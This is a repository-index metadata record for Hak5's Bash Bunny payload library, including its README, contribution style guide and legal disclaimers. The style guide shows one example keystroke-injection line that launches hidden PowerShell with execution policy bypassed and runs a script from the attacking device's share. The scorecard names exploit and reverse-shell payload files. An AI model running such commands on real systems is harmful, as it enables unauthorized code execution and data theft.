{"id":13510640,"url":"https://github.com/hak5/bashbunny-payloads","last_synced_at":"2026-01-17T01:26:04.399Z","repository":{"id":18204454,"uuid":"78046086","full_name":"hak5/bashbunny-payloads","owner":"hak5","description":"The Official Bash Bunny Payload Repository","archived":false,"fork":false,"pushed_at":"2025-12-03T23:02:29.000Z","size":69612,"stargazers_count":2842,"open_issues_count":106,"forks_count":1487,"subscribers_count":347,"default_branch":"master","last_synced_at":"2025-12-07T05:06:23.487Z","etag":null,"topics":["badusb","bashbunny","duckyscript","hak5","hak5-bashbunny","hid","keystroke-injection","pentesting","security-tools"],"latest_commit_sha":null,"homepage":"https://bashbunny.com","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hak5.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-01-04T19:27:33.000Z","updated_at":"2025-12-03T23:02:36.000Z","dependencies_parsed_at":"2024-11-01T11:31:11.666Z","dependency_job_id":"68423905-a2bc-41d8-afba-0c74c98d2623","html_url":"https://github.com/hak5/bashbunny-payloads","commit_stats":{"total_commits":571,"total_committers":154,"mean_commits":3.707792207792208,"dds":0.8633975481611209,"last_synced_commit":"cb16ca918d5a37e2412fc418b96e5d6dc1eb8b53"},"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"purl":"pkg:github/hak5/bashbunny-payloads","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbu
nny-payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hak5","download_url":"https://codeload.github.com/hak5/bashbunny-payloads/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads/sbom","scorecard":{"id":453160,"data":{"date":"2025-08-11","repo":{"name":"github.com/hak5/bashbunny-payloads","commit":"5c7d23d39365ec5620fc7e49424c97e86d5c45d5"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":2.7,"checks":[{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":-1,"reason":"No tokens found","details":null,"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":-1,"reason":"no workflows found","details":null,"documentation":{"short":"Determines if the 
project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":2,"reason":"binaries present in source code","details":["Warn: binary detected: payloads/library/credentials/BunnyLogger/xinput:1","Warn: binary detected: payloads/library/credentials/BunnyLogger2.0/requirements/nc:1","Warn: binary detected: payloads/library/credentials/BunnyLogger2.0/requirements/xinput:1","Warn: binary detected: payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit:1","Warn: binary detected: payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so:1","Warn: binary detected: 
payloads/library/execution/mine4me/mine4me/systemIn/systemIO:1","Warn: binary detected: payloads/library/phishing/Captiveportal/captiveportal:1","Warn: binary detected: payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":8,"reason":"2 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2018-21 / GHSA-hgg3-g7gr-66r7","Warn: Project is vulnerable to: GHSA-j225-cvw7-qrx7"],"documentation":{"short":"Determines if the project has open, known unfixed 
vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Info: Possibly incomplete results: error parsing shell code: \u003e must be followed by a word: payloads/library/credentials/BunnyPicker/payload.txt:0","Info: Possibly incomplete results: error parsing shell code: \"elif \u003ccond\u003e\" must be followed by \"then\": payloads/library/credentials/bushingsBlueTurtle/post.sh:0","Info: Possibly incomplete results: error parsing shell code: (( can only be used to open an arithmetic cmd: payloads/library/prank/90sMode/payload.txt:0","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/binwalk.sh:12","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/dshell.sh:12","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/setup.sh:15","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/ssdeep.sh:23","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/viper.sh:17","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/yara.sh:23","Warn: pipCommand not pinned by hash: payloads/library/recon/rdp_checker/install.sh:23","Info:   0 out of   7 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build 
process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}}]},"last_synced_at":"2025-08-19T08:44:00.411Z","repository_id":18204454,"created_at":"2025-08-19T08:44:00.412Z","updated_at":"2025-08-19T08:44:00.412Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28491478,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-17T00:50:05.742Z","status":"ssl_error","status_checked_at":"2026-01-17T00:43:11.982Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["badusb","bashbunny","duckyscript","hak5","hak5-bashbunny","hid","keystroke-injection","pentesting","security-tools"],"created_at":"2024-08-01T02:01:48.207Z","updated_at":"2026-01-17T01:26:04.385Z","avatar_url":"https://github.com/hak5.png","language":"PowerShell","readme":"# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)\n\nThis repository contains payloads and extensions for the Hak5 Bash Bunny. 
Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.\n\n**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** \u003ca href=\"#legal\"\u003e\u003cb\u003eSee Legal and Disclaimers\u003c/b\u003e\u003c/a\u003e\n\n\u003cdiv align=\"center\"\u003e\n\u003cimg src=\"https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge\"/\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003cimg src=\"https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge\"/\u003e\n\u003cbr/\u003e\n\u003cimg src=\"https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge\"\u003e\n\u003c/div\u003e\n\u003cbr/\u003e\n\u003cp align=\"center\"\u003e\n\u003ca href=\"https://payloadhub.com\"\u003e\u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600\"\u003e\u003c/a\u003e\n\u003cbr/\u003e\n\u003ca href=\"https://payloadhub.com/blogs/payloads/tagged/bash-bunny\"\u003eView Featured Bash Bunny Payloads and Leaderboard\u003c/a\u003e\n\u003cbr/\u003e\u003ci\u003eGet your payload in front of thousands. 
Enter to win over $2,000 in prizes in the \u003ca href=\"https://hak5.org/pages/payload-awards\"\u003eHak5 Payload Awards!\u003c/a\u003e\u003c/i\u003e\n\u003c/p\u003e\n\n\u003cdiv align=\"center\"\u003e\n\u003ca href=\"https://hak5.org/discord\"\u003e\u003cimg src=\"https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord\u0026style=for-the-badge\"\u003e\u003c/a\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003ca href=\"https://youtube.com/hak5\"\u003e\u003cimg src=\"https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views\u0026style=for-the-badge\"/\u003e\u003c/a\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003ca href=\"https://youtube.com/hak5\"\u003e\u003cimg src=\"https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge\"/\u003e\u003c/a\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003ca href=\"https://twitter.com/hak5\"\u003e\u003cimg src=\"https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter\u0026style=for-the-badge\"/\u003e\u003c/a\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003ca href=\"https://instagram.com/hak5gear\"\u003e\u003cimg src=\"https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge\u0026logo=instagram\u0026logoColor=white\"/\u003e\u003c/a\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\n\u003c/div\u003e\n\n\n# Table of contents\n\u003cdetails open\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"#about-the-bash-bunny\"\u003eAbout the Bash Bunny\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#build-your-payloads-with-payloadstudio\"\u003ePayloadStudio (Editor + Compiler)\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cb\u003e\u003ca href=\"#contributing\"\u003eContributing Payloads\u003c/a\u003e\u003c/b\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#legal\"\u003e\u003cb\u003eLegal and 
Disclaimers\u003c/b\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e \n\u003c/details\u003e\n\n\n## Shop\n- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny \"Purchase the Bash Bunny\")\n- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro \"Purchase PayloadStudio Pro\")\n- [Shop All Hak5 Tools](https://shop.hak5.org \"Shop All Hak5 Tools\")\n## Getting Started\n- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ \"QUICK START GUIDE\") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)\n## Documentation / Learn More\n-   [Documentation](https://docs.hak5.org/bash-bunny/ \"Documentation\") \n\n## Community\n*Got Questions? Need some help? Reach out:*\n-  [Discord](https://hak5.org/discord/ \"Discord\") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ \"Forums\")\n\n\n## Additional Links\n\u003cb\u003e Follow the creators \u003c/b\u003e\u003cbr/\u003e\n\u003cp\u003e\n\t\u003cb\u003eKorben's Socials\u003c/b\u003e\u003cbr/\u003e\t\n\t\u003ca href=\"https://twitter.com/notkorben\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/notkorben?style=social\"/\u003e\u003c/a\u003e  \n\t\u003ca href=\"https://instagram.com/hak5korben\"\u003e\u003cimg src=\"https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C\"/\u003e\u003c/a\u003e\n\u003cbr/\u003e\n\t\u003cb\u003eDarren's Socials\u003c/b\u003e\u003cbr/\u003e\n\t\u003ca href=\"https://twitter.com/hak5darren\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/hak5darren?style=social\"/\u003e\u003c/a\u003e  \n\t\u003ca href=\"https://instagram.com/hak5darren\"\u003e\u003cimg src=\"https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C\"/\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\u003cbr/\u003e\n\u003ch1\u003e\u003ca href=\"https://shop.hak5.org/products/bash-bunny\"\u003eAbout the Bash 
Bunny\u003c/a\u003e\u003c/h1\u003e\n\nLinux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits. \n\n\n\u003cb\u003e\u003cdiv align=\"center\"\u003e\n\t\u003cbr/\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\u003c/div\u003e\u003c/b\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://www.youtube.com/watch?v=-UmvZdDxCiI\"\u003e\n    \u003cimg src=\"https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png\" width=\"500\"/\u003e\n  \u003c/a\u003e\n  \u003cbr/\u003e\n\u003c/p\u003e\n\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236\" alt=\"image\"\u003e\n\u003c/p\u003e\n\n## \u003cdiv align=\"center\"\u003eADVANCED ATTACKS \u003c/div\u003e\n\nFor the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369\" alt=\"image\"\u003e\n\u003c/p\u003e\n\n## \u003cdiv align=\"center\"\u003eSIMPLE PAYLOADS \u003c/div\u003e\n\nEach attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. 
Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437\" alt=\"image\"\u003e\n\u003c/p\u003e\n\n## \u003cdiv align=\"center\"\u003eSIMPLE POWERFUL HARDWARE \u003c/div\u003e\n\nIt's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.\n\n\n\u003ch1\u003e\u003ca href=\"https://payloadstudio.hak5.org\"\u003eBuild your payloads with PayloadStudio\u003c/a\u003e\u003c/h1\u003e\n\u003cp align=\"center\"\u003e\nTake your DuckyScript™ payloads to the next level with this full-featured,\u003cb\u003e web-based (entirely client side) \u003c/b\u003e development environment.\n\u003cbr/\u003e\n\u003ca href=\"https://payloadstudio.hak5.org\"\u003e\u003cimg width=\"500px\" src=\"https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png\"\u003e\u003c/a\u003e\n\u003cbr/\u003e\n\u003ci\u003ePayload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!\n\u003cbr/\u003e\u003cbr/\u003e\nSupports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel \u0026 LAN Turtle!\n\u003cbr/\u003e\u003cbr/\u003e\u003c/i\u003e\u003cbr/\u003e\n\u003ca href=\"https://hak5.org/products/payload-studio-pro\"\u003eBecome a PayloadStudio Pro\u003c/a\u003e and \u003cb\u003e Unleash your hacking creativity! 
\u003c/b\u003e\n\u003cbr/\u003e\nOR\n\u003cbr/\u003e\n\u003ca href=\"https://payloadstudio.hak5.org/community/\"\u003e Try Community Edition FREE\u003c/a\u003e \n\u003cbr/\u003e\u003cbr/\u003e\n\u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557\"\u003e\n\u003cbr/\u003e\n\u003ci\u003e Payload Studio Themes Preview GIF \u003c/i\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513\"\u003e\n\u003cbr/\u003e\n\u003ci\u003e Payload Studio Autocomplete Preview GIF \u003c/i\u003e\n\u003c/p\u003e\n\n\n## Disclaimer\nGenerally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.\n\n\u003ch1\u003e\u003ca href='https://payloadhub.com'\u003eContributing\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp align=\"center\"\u003e\n\u003ca href=\"https://payloadhub.com\"\u003e\u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600\"\u003e\u003c/a\u003e\n\u003cbr/\u003e\n\u003ca href=\"https://payloadhub.com\"\u003eView Featured Payloads and Leaderboard \u003c/a\u003e\n\u003c/p\u003e\n\n# Please adhere to the following best practices and style guides when submitting a payload.\n\nOnce you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.\n\nPlease include all resources required for the payload to run. 
If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of others, please make sure to cite their work, giving proper credit. \n\n\n### Purely Destructive payloads will not be accepted. No, it's not \"just a prank\".\nSubject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.\n\n\n\n## Naming Conventions\nPlease give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submitted in its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.\n\n## Staged Payloads\n\"Staged payloads\" are payloads that **download** code from some resource external to the payload.txt. \n\nWhile staging code used in payloads is often useful and appropriate, using this (or another) GitHub repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**. 
\n\nStaged code should be copied to and hosted on an appropriate server **by the end user** - GitHub and this repository are simply resources for sharing code among developers and users.\nSee: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)\n\nAdditionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a separate file. **Links to staged code are unacceptable**, not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind a pre-defined external URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.\n\n### Including URLs\nURLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration). 
\n\n### Staged Example\n\n**Example scenario: your payload downloads a script and then executes it on a target machine.**\n- Include the script in the directory with your payload\n- Provide instructions for the user to move the script to the appropriate hosting service.\n- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script\n\n[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)\n\n## Payload Configuration\nBe sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.\nIn many cases, payloads will require some level of configuration **by the end payload user**. \n\n- Abstract configuration(s) for ease of use. Use bash assignment variables where possible. \n- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...\n- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how specific resources should be hosted on the appropriate infrastructure.\n- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or \"inline\" where applicable.\n\n```\nExample: \n\tBEGINNING OF PAYLOAD \n\t... Payload Documentation... 
\n\n\t# CONFIGURATION\n\t# REQUIRED - Provide URL used for Example\n\tMY_TARGET_URL=\"example.com\"\n\n\t#  OPTIONAL - How long until payload starts; default 5s\n\tBOOT_DELAY=\"5000\"\n\n\tQUACK DELAY $BOOT_DELAY\n\t...\n\tQUACK STRING $MY_TARGET_URL\n\t...\n```\n\n## Payload Documentation \nPayloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.\n\n```\nExample:\n\tBEGINNING OF PAYLOAD\n\n\t# Title: Example Payload\n\t# Author: Korben Dallas\n\t# Description: Opens hidden powershell and\n\t# Target: Windows 10\n\t# Props: Hak5, Darren Kitchen, Korben\n\t# Version: 1.0\n\t# Category: General\n```\n\n\n### Binaries\nBinaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.\n\n   \n### Configuration Options\nConfigurable options should be specified in variables at the top of the payload.txt file\n\n    # Options\n    RESPONDER_OPTIONS=\"-w -r -d -P\"\n    LOOTDIR=/root/udisk/loot/quickcreds\n\n### LED\nThe payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.\n\n    # Initialization\n    LED SETUP\n    GET SWITCH_POSITION\n    GET HOST_IP\n    \n    # Attack\n    LED ATTACK\n    ATTACKMODE HID ECM_ETHERNET\n\n### Stages and States\nStages should be documented with comments\n\n    # Keystroke Injection Stage\n    # Runs hidden powershell which executes \\\\172.16.64.1\\s\\s.ps1 when available\n    GET HOST_IP\n    LED STAGE1\n    ATTACKMODE HID\n    RUN WIN \"powershell -WindowStyle Hidden -Exec Bypass \\\"while (\\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\\\\\$HOST_IP\\\\s\\\\s.ps1; exit } }\\\"\"\n\nCommon payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. 
More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.\n\n\u003ch1\u003e\u003ca href=\"https://hak5.org/pages/policy\"\u003eLegal\u003c/a\u003e\u003c/h1\u003e\n\nPayloads from this repository are provided for educational purposes only.  Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.\n\nBash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.\nBash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)\nDuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.\nThis material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. 
Hak5 LLC claims no responsibility for unauthorized or unlawful use.\nHak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.\n\nSee also: \n\n[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)\n\t\n[Terms of Service](https://shop.hak5.org/pages/terms-of-service)\n\n# Disclaimer\n\u003ch3\u003e\u003cb\u003eAs with any script, you are advised to proceed with caution.\u003c/h3\u003e\u003c/b\u003e\n\u003ch3\u003e\u003cb\u003eGenerally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.\u003c/h3\u003e\u003c/b\u003e\n","funding_links":[],"categories":["PowerShell","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"783f861b9f822127dba99acb55687cbb\"\u003e\u003c/a\u003e工具","security-tools"],"sub_categories":["\u003ca id=\"80301821d0f5d8ec2dd3754ebb1b4b10\"\u003e\u003c/a\u003ePayload\u0026\u0026远控\u0026\u0026RAT","\u003ca id=\"6602e118e0245c83b13ff0db872c3723\"\u003e\u003c/a\u003e未分类-payload"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhak5%2Fbashbunny-payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhak5%2Fbashbunny-payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhak5%2Fbashbunny-payloads/lists"}